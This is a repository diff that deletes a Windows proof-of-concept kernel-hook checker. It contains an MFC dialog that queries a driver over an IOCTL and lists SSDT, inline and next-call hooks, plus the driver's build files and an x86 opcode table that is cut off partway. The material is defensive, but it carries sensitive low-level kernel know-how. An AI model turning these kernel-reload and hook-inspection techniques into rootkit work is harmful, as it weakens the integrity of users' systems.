<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;_WINDOWS;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<ValidateAllParameters>true</ValidateAllParameters>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</Midl>
<ResourceCompile>
<Culture>0x0804</Culture>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
<None Include="res\CheckKernelHook.ico" />
<None Include="res\CheckKernelHook.rc2" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="AddService.h" />
<ClInclude Include="CheckKernelHook.h" />
<ClInclude Include="CheckKernelHookDlg.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="AddService.cpp" />
<ClCompile Include="CheckKernelHook.cpp" />
<ClCompile Include="CheckKernelHookDlg.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CheckKernelHook.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
<ProjectExtensions>
<VisualStudio>
<UserProperties RESOURCE_FILE="CheckKernelHook.rc" />
</VisualStudio>
</ProjectExtensions>
</Project>

65
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHook.vcxproj.filters
View File

@ -1,65 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
<None Include="res\CheckKernelHook.rc2">
<Filter>资源文件</Filter>
</None>
<None Include="res\CheckKernelHook.ico">
<Filter>资源文件</Filter>
</None>
</ItemGroup>
<ItemGroup>
<ClInclude Include="CheckKernelHook.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="CheckKernelHookDlg.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="AddService.h">
<Filter>源文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="CheckKernelHook.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="CheckKernelHookDlg.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="AddService.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CheckKernelHook.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

283
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHookDlg.cpp
View File

@ -1,283 +0,0 @@
// CheckKernelHookDlg.cpp : 实现文件
//
#include "stdafx.h"
#include "CheckKernelHook.h"
#include "CheckKernelHookDlg.h"
#include "afxdialogex.h"
#include "AddService.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
HANDLE g_hDevice = NULL;
typedef struct
{
WCHAR* szTitle; //列表的名称
int nWidth; //列表的宽度
}COLUMNSTRUCT;
COLUMNSTRUCT g_Column_Data_Online[] =
{
{L"原始地址", 148 },
{L"函数名称", 150 },
{L"Hook地址", 160 },
{L"模块名称", 300 },
{L"模块基址", 80 },
{L"模块大小", 81 },
{L"类型", 81 }
};
int g_Column_Count_Online = 7; //列表的个数
int g_Column_Online_Width = 0;
// 用于应用程序“关于”菜单项的 CAboutDlg 对话框
class CAboutDlg : public CDialogEx
{
public:
CAboutDlg();
// 对话框数据
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
// 实现
protected:
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialogEx(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialogEx::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialogEx)
END_MESSAGE_MAP()
// CCheckKernelHookDlg 对话框
CCheckKernelHookDlg::CCheckKernelHookDlg(CWnd* pParent /*=NULL*/)
: CDialogEx(CCheckKernelHookDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CCheckKernelHookDlg::DoDataExchange(CDataExchange* pDX)
{
CDialogEx::DoDataExchange(pDX);
DDX_Control(pDX, IDC_LIST, m_List);
}
BEGIN_MESSAGE_MAP(CCheckKernelHookDlg, CDialogEx)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
END_MESSAGE_MAP()
// CCheckKernelHookDlg 消息处理程序
BOOL CCheckKernelHookDlg::OnInitDialog()
{
CDialogEx::OnInitDialog();
// 将“关于...”菜单项添加到系统菜单中。
// IDM_ABOUTBOX 必须在系统命令范围内。
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
BOOL bNameValid;
CString strAboutMenu;
bNameValid = strAboutMenu.LoadString(IDS_ABOUTBOX);
ASSERT(bNameValid);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// 设置此对话框的图标。当应用程序主窗口不是对话框时,框架将自动
// 执行此操作
SetIcon(m_hIcon, TRUE); // 设置大图标
SetIcon(m_hIcon, FALSE); // 设置小图标
m_List.SetExtendedStyle(LVS_EX_FULLROWSELECT);
for (int i = 0; i < g_Column_Count_Online; i++)
{
m_List.InsertColumn(i, g_Column_Data_Online[i].szTitle,LVCFMT_CENTER,g_Column_Data_Online[i].nWidth);
g_Column_Online_Width+=g_Column_Data_Online[i].nWidth;
}
//LoadDrv(L"CheckKernelHook");
g_hDevice = OpenDevice(L"\\\\.\\CheckKernelHookLinkName");
if (g_hDevice==(HANDLE)-1)
{
MessageBox(L"打开设备失败");
return TRUE;
}
CheckKernelHook();
return TRUE; // 除非将焦点设置到控件,否则返回 TRUE
}
VOID CCheckKernelHookDlg::CheckKernelHook()
{
ULONG_PTR ulCount = 0x1000;
PINLINEHOOKINFO PInlineHookInfo = NULL;
BOOL bRet = FALSE;
DWORD ulReturnSize = 0;
do
{
ULONG_PTR ulSize = 0;
if (PInlineHookInfo)
{
free(PInlineHookInfo);
PInlineHookInfo = NULL;
}
ulSize = sizeof(INLINEHOOKINFO) + ulCount * sizeof(INLINEHOOKINFO_INFORMATION);
PInlineHookInfo = (PINLINEHOOKINFO)malloc(ulSize);
if (!PInlineHookInfo)
{
break;
}
memset(PInlineHookInfo,0,ulSize);
bRet = DeviceIoControl(g_hDevice,CTL_CHECKKERNELMODULE,
NULL,
0,
PInlineHookInfo,
ulSize,
&ulReturnSize,
NULL);
ulCount = PInlineHookInfo->ulCount + 1000;
} while (bRet == FALSE && GetLastError() == ERROR_INSUFFICIENT_BUFFER);
if(PInlineHookInfo->ulCount==0)
{
MessageBox(L"当前内核安全",L"");
}
else
{
InsertDataToList(PInlineHookInfo);
}
if (PInlineHookInfo)
{
free(PInlineHookInfo);
PInlineHookInfo = NULL;
}
}
VOID CCheckKernelHookDlg::InsertDataToList(PINLINEHOOKINFO PInlineHookInfo)
{
CString OrgAddress,CurAddress,ModuleBase,ModuleSize;
for(int i=0;i<PInlineHookInfo->ulCount;i++)
{
OrgAddress.Format(L"0x%p",PInlineHookInfo->InlineHook[i].ulMemoryFunctionBase);
CurAddress.Format(L"0x%p",PInlineHookInfo->InlineHook[i].ulMemoryHookBase);
ModuleBase.Format(L"0x%p",PInlineHookInfo->InlineHook[i].ulHookModuleBase);
ModuleSize.Format(L"%d",PInlineHookInfo->InlineHook[i].ulHookModuleSize);
int n = m_List.InsertItem(m_List.GetItemCount(),OrgAddress,0); //注意这里的i 就是Icon 在数组的位置
CString szFunc=L"";
CString ModuleName = L"";
szFunc +=PInlineHookInfo->InlineHook[i].lpszFunction;
ModuleName += PInlineHookInfo->InlineHook[i].lpszHookModuleImage;
m_List.SetItemText(n,1,szFunc);
m_List.SetItemText(n,2,CurAddress);
m_List.SetItemText(n,3,ModuleName);
m_List.SetItemText(n,4,ModuleBase);
m_List.SetItemText(n,5,ModuleSize);
CString Type= L"";
if(PInlineHookInfo->InlineHook[i].ulHookType==1)
{
Type +=L"SSDT Hook";
}
else if(PInlineHookInfo->InlineHook[i].ulHookType==2)
{
Type +=L"Next Call Hook";
}
else if(PInlineHookInfo->InlineHook[i].ulHookType==0)
{
Type +=L"Inline Hook";
}
m_List.SetItemText(n,6,Type);
}
UpdateData(TRUE);
}
void CCheckKernelHookDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialogEx::OnSysCommand(nID, lParam);
}
}
// 如果向对话框添加最小化按钮,则需要下面的代码
// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序,
// 这将由框架自动完成。
void CCheckKernelHookDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // 用于绘制的设备上下文
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// 使图标在工作区矩形中居中
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// 绘制图标
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialogEx::OnPaint();
}
}
//当用户拖动最小化窗口时系统调用此函数取得光标
//显示。
HCURSOR CCheckKernelHookDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}

76
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/CheckKernelHookDlg.h
View File

@ -1,76 +0,0 @@
// CheckKernelHookDlg.h : 头文件
//
#pragma once
#include "afxcmn.h"
#include "resource.h"
#include <WinIoCtl.h>
typedef struct _INLINEHOOKINFO_INFORMATION { //INLINEHOOKINFO_INFORMATION
ULONG ulHookType;
ULONG ulMemoryFunctionBase; //原始地址
ULONG ulMemoryHookBase; //HOOK 地址
CHAR lpszFunction[256];
CHAR lpszHookModuleImage[256];
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
} INLINEHOOKINFO_INFORMATION, *PINLINEHOOKINFO_INFORMATION;
typedef struct _INLINEHOOKINFO { //InlineHook
ULONG ulCount;
INLINEHOOKINFO_INFORMATION InlineHook[1];
} INLINEHOOKINFO, *PINLINEHOOKINFO;
#define CTL_CHECKKERNELMODULE \
CTL_CODE(FILE_DEVICE_UNKNOWN,0x830,METHOD_NEITHER,FILE_ANY_ACCESS)
// CCheckKernelHookDlg 对话框
class CCheckKernelHookDlg : public CDialogEx
{
// 构造
public:
CCheckKernelHookDlg(CWnd* pParent = NULL); // 标准构造函数
// 对话框数据
enum { IDD = IDD_CHECKKERNELHOOK_DIALOG };
VOID CheckKernelHook();
VOID InsertDataToList(PINLINEHOOKINFO PInlineHookInfo);
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
HANDLE OpenDevice(LPCTSTR wzLinkPath)
{
HANDLE hDevice = CreateFile(wzLinkPath,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
}
return hDevice;
}
// 实现
protected:
HICON m_hIcon;
// 生成的消息映射函数
virtual BOOL OnInitDialog();
afx_msg void OnSysCommand(UINT nID, LPARAM lParam);
afx_msg void OnPaint();
afx_msg HCURSOR OnQueryDragIcon();
DECLARE_MESSAGE_MAP()
public:
CListCtrl m_List;
};

BIN
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/res/CheckKernelHook.ico
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 66 KiB

BIN
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/res/CheckKernelHook.rc2
View File

Binary file not shown.

1
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/res/ReadMe.txt
View File

@ -1 +0,0 @@
Check Kernel EAT Hook

BIN
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/resource.h
View File

Binary file not shown.

8
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/stdafx.cpp
View File

@ -1,8 +0,0 @@
// stdafx.cpp : 只包括标准包含文件的源文件
// CheckKernelHook.pch 将作为预编译头
// stdafx.obj 将包含预编译类型信息
#include "stdafx.h"

58
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/stdafx.h
View File

@ -1,58 +0,0 @@
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
#pragma once
#ifndef _SECURE_ATL
#define _SECURE_ATL 1
#endif
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头中排除极少使用的资料
#endif
#include "targetver.h"
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
// 关闭 MFC 对某些常见但经常可放心忽略的警告消息的隐藏
#define _AFX_ALL_WARNINGS
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#include <afxdisp.h> // MFC 自动化类
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <afxcontrolbars.h> // 功能区和控件条的 MFC 支持
#ifdef _UNICODE
#if defined _M_IX86
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_X64
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#else
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"")
#endif
#endif

8
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHook/CheckKernelHook/targetver.h
View File

@ -1,8 +0,0 @@
#pragma once
// 包括 SDKDDKVer.h 将定义最高版本的可用 Windows 平台。
// 如果要为以前的 Windows 平台生成应用程序,请包括 WinSDKVer.h并将
// WIN32_WINNT 宏设置为要支持的平台,然后再包括 SDKDDKVer.h。
#include <SDKDDKVer.h>

20
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook.sln
View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CheckKernelHook", "CheckKernelHook\CheckKernelHook.vcxproj", "{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Debug|Win32.ActiveCfg = WinDDK|Win32
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Debug|Win32.Build.0 = WinDDK|Win32
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Release|Win32.ActiveCfg = WinDDK|Win32
{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}.Release|Win32.Build.0 = WinDDK|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

82
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/CheckKernelHook.vcxproj
View File

@ -1,82 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="WinDDK|Win32">
<Configuration>WinDDK</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Common.c" />
<ClCompile Include="DriverEntry.c" />
<ClCompile Include="FileSystem.c" />
<ClCompile Include="FixRelocation.c" />
<ClCompile Include="KernelHookCheck.c" />
<ClCompile Include="KernelReload.c" />
<ClCompile Include="libdasm.c" />
<ClCompile Include="Reload.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="Common.h" />
<ClInclude Include="DriverEntry.h" />
<ClInclude Include="FileSystem.h" />
<ClInclude Include="FixRelocation.h" />
<ClInclude Include="KernelHookCheck.h" />
<ClInclude Include="KernelReload.h" />
<ClInclude Include="libdasm.h" />
<ClInclude Include="Reload.h" />
<ClInclude Include="tables.h" />
</ItemGroup>
<ItemGroup>
<None Include="sources" />
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{4EE67C57-BE79-4CD7-B3B0-94AECE62DB41}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>"CheckKernelHook"</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='WinDDK|Win32'">
<TargetExt>.sys</TargetExt>
<GenerateManifest>false</GenerateManifest>
<ExecutablePath>$(WLHBASE)\bin\x86\x86;$(WLHBASE)\bin\x86</ExecutablePath>
<IncludePath>$(WLHBASE)\inc\api;$(WLHBASE)\inc\crt;$(WLHBASE)\inc\ddk;$(WLHBASE)\inc</IncludePath>
<ReferencePath />
<LibraryPath>$(WLHBASE)\lib\win7\i386</LibraryPath>
<SourcePath />
<ExcludePath />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='WinDDK|Win32'">
<ClCompile>
<PreprocessorDefinitions>_X86_;DBG=1</PreprocessorDefinitions>
<ExceptionHandling>false</ExceptionHandling>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CallingConvention>StdCall</CallingConvention>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>
</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<AdditionalDependencies>ntoskrnl.lib;hal.lib;wdm.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<Link>
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
<SubSystem>Native</SubSystem>
<Driver>Driver</Driver>
<EntryPointSymbol>DriverEntry</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<BaseAddress>0x10000</BaseAddress>
<RandomizedBaseAddress>
</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
</Link>
</ItemDefinitionGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

48
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/CheckKernelHook.vcxproj.filters
View File

@ -1,48 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="Common.c" />
<ClCompile Include="DriverEntry.c" />
<ClCompile Include="KernelHookCheck.c" />
<ClCompile Include="libdasm.c" />
<ClCompile Include="FileSystem.c">
<Filter>Reload</Filter>
</ClCompile>
<ClCompile Include="FixRelocation.c">
<Filter>Reload</Filter>
</ClCompile>
<ClCompile Include="KernelReload.c">
<Filter>Reload</Filter>
</ClCompile>
<ClCompile Include="Reload.c">
<Filter>Reload</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Common.h" />
<ClInclude Include="DriverEntry.h" />
<ClInclude Include="KernelHookCheck.h" />
<ClInclude Include="libdasm.h" />
<ClInclude Include="tables.h" />
<ClInclude Include="FileSystem.h">
<Filter>Reload</Filter>
</ClInclude>
<ClInclude Include="FixRelocation.h">
<Filter>Reload</Filter>
</ClInclude>
<ClInclude Include="KernelReload.h">
<Filter>Reload</Filter>
</ClInclude>
<ClInclude Include="Reload.h">
<Filter>Reload</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<None Include="sources" />
</ItemGroup>
<ItemGroup>
<Filter Include="Reload">
<UniqueIdentifier>{7f84aa62-4fe1-452a-a193-32b7b7a3e2db}</UniqueIdentifier>
</Filter>
</ItemGroup>
</Project>

783
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/Common.c
View File

@ -1,783 +0,0 @@
#include "Common.h"
#include "Reload.h"
UCHAR OpcodeFlags[256] =
{
OP_MODRM, // 00
OP_MODRM, // 01
OP_MODRM, // 02
OP_MODRM, // 03
OP_DATA_I8, // 04
OP_DATA_PRE66_67, // 05
OP_NONE, // 06
OP_NONE, // 07
OP_MODRM, // 08
OP_MODRM, // 09
OP_MODRM, // 0A
OP_MODRM, // 0B
OP_DATA_I8, // 0C
OP_DATA_PRE66_67, // 0D
OP_NONE, // 0E
OP_NONE, // 0F
OP_MODRM, // 10
OP_MODRM, // 11
OP_MODRM, // 12
OP_MODRM, // 13
OP_DATA_I8, // 14
OP_DATA_PRE66_67, // 15
OP_NONE, // 16
OP_NONE, // 17
OP_MODRM, // 18
OP_MODRM, // 19
OP_MODRM, // 1A
OP_MODRM, // 1B
OP_DATA_I8, // 1C
OP_DATA_PRE66_67, // 1D
OP_NONE, // 1E
OP_NONE, // 1F
OP_MODRM, // 20
OP_MODRM, // 21
OP_MODRM, // 22
OP_MODRM, // 23
OP_DATA_I8, // 24
OP_DATA_PRE66_67, // 25
OP_NONE, // 26
OP_NONE, // 27
OP_MODRM, // 28
OP_MODRM, // 29
OP_MODRM, // 2A
OP_MODRM, // 2B
OP_DATA_I8, // 2C
OP_DATA_PRE66_67, // 2D
OP_NONE, // 2E
OP_NONE, // 2F
OP_MODRM, // 30
OP_MODRM, // 31
OP_MODRM, // 32
OP_MODRM, // 33
OP_DATA_I8, // 34
OP_DATA_PRE66_67, // 35
OP_NONE, // 36
OP_NONE, // 37
OP_MODRM, // 38
OP_MODRM, // 39
OP_MODRM, // 3A
OP_MODRM, // 3B
OP_DATA_I8, // 3C
OP_DATA_PRE66_67, // 3D
OP_NONE, // 3E
OP_NONE, // 3F
OP_NONE, // 40
OP_NONE, // 41
OP_NONE, // 42
OP_NONE, // 43
OP_NONE, // 44
OP_NONE, // 45
OP_NONE, // 46
OP_NONE, // 47
OP_NONE, // 48
OP_NONE, // 49
OP_NONE, // 4A
OP_NONE, // 4B
OP_NONE, // 4C
OP_NONE, // 4D
OP_NONE, // 4E
OP_NONE, // 4F
OP_NONE, // 50
OP_NONE, // 51
OP_NONE, // 52
OP_NONE, // 53
OP_NONE, // 54
OP_NONE, // 55
OP_NONE, // 56
OP_NONE, // 57
OP_NONE, // 58
OP_NONE, // 59
OP_NONE, // 5A
OP_NONE, // 5B
OP_NONE, // 5C
OP_NONE, // 5D
OP_NONE, // 5E
OP_NONE, // 5F
OP_NONE, // 60
OP_NONE, // 61
OP_MODRM, // 62
OP_MODRM, // 63
OP_NONE, // 64
OP_NONE, // 65
OP_NONE, // 66
OP_NONE, // 67
OP_DATA_PRE66_67, // 68
OP_MODRM | OP_DATA_PRE66_67, // 69
OP_DATA_I8, // 6A
OP_MODRM | OP_DATA_I8, // 6B
OP_NONE, // 6C
OP_NONE, // 6D
OP_NONE, // 6E
OP_NONE, // 6F
OP_DATA_I8, // 70
OP_DATA_I8, // 71
OP_DATA_I8, // 72
OP_DATA_I8, // 73
OP_DATA_I8, // 74
OP_DATA_I8, // 75
OP_DATA_I8, // 76
OP_DATA_I8, // 77
OP_DATA_I8, // 78
OP_DATA_I8, // 79
OP_DATA_I8, // 7A
OP_DATA_I8, // 7B
OP_DATA_I8, // 7C
OP_DATA_I8, // 7D
OP_DATA_I8, // 7E
OP_DATA_I8, // 7F
OP_MODRM | OP_DATA_I8, // 80
OP_MODRM | OP_DATA_PRE66_67, // 81
OP_MODRM | OP_DATA_I8, // 82
OP_MODRM | OP_DATA_I8, // 83
OP_MODRM, // 84
OP_MODRM, // 85
OP_MODRM, // 86
OP_MODRM, // 87
OP_MODRM, // 88
OP_MODRM, // 89
OP_MODRM, // 8A
OP_MODRM, // 8B
OP_MODRM, // 8C
OP_MODRM, // 8D
OP_MODRM, // 8E
OP_MODRM, // 8F
OP_NONE, // 90
OP_NONE, // 91
OP_NONE, // 92
OP_NONE, // 93
OP_NONE, // 94
OP_NONE, // 95
OP_NONE, // 96
OP_NONE, // 97
OP_NONE, // 98
OP_NONE, // 99
OP_DATA_I16 | OP_DATA_PRE66_67,// 9A
OP_NONE, // 9B
OP_NONE, // 9C
OP_NONE, // 9D
OP_NONE, // 9E
OP_NONE, // 9F
OP_DATA_PRE66_67, // A0
OP_DATA_PRE66_67, // A1
OP_DATA_PRE66_67, // A2
OP_DATA_PRE66_67, // A3
OP_NONE, // A4
OP_NONE, // A5
OP_NONE, // A6
OP_NONE, // A7
OP_DATA_I8, // A8
OP_DATA_PRE66_67, // A9
OP_NONE, // AA
OP_NONE, // AB
OP_NONE, // AC
OP_NONE, // AD
OP_NONE, // AE
OP_NONE, // AF
OP_DATA_I8, // B0
OP_DATA_I8, // B1
OP_DATA_I8, // B2
OP_DATA_I8, // B3
OP_DATA_I8, // B4
OP_DATA_I8, // B5
OP_DATA_I8, // B6
OP_DATA_I8, // B7
OP_DATA_PRE66_67, // B8
OP_DATA_PRE66_67, // B9
OP_DATA_PRE66_67, // BA
OP_DATA_PRE66_67, // BB
OP_DATA_PRE66_67, // BC
OP_DATA_PRE66_67, // BD
OP_DATA_PRE66_67, // BE
OP_DATA_PRE66_67, // BF
OP_MODRM | OP_DATA_I8, // C0
OP_MODRM | OP_DATA_I8, // C1
OP_DATA_I16, // C2
OP_NONE, // C3
OP_MODRM, // C4
OP_MODRM, // C5
OP_MODRM | OP_DATA_I8, // C6
OP_MODRM | OP_DATA_PRE66_67, // C7
OP_DATA_I8 | OP_DATA_I16, // C8
OP_NONE, // C9
OP_DATA_I16, // CA
OP_NONE, // CB
OP_NONE, // CC
OP_DATA_I8, // CD
OP_NONE, // CE
OP_NONE, // CF
OP_MODRM, // D0
OP_MODRM, // D1
OP_MODRM, // D2
OP_MODRM, // D3
OP_DATA_I8, // D4
OP_DATA_I8, // D5
OP_NONE, // D6
OP_NONE, // D7
OP_WORD, // D8
OP_WORD, // D9
OP_WORD, // DA
OP_WORD, // DB
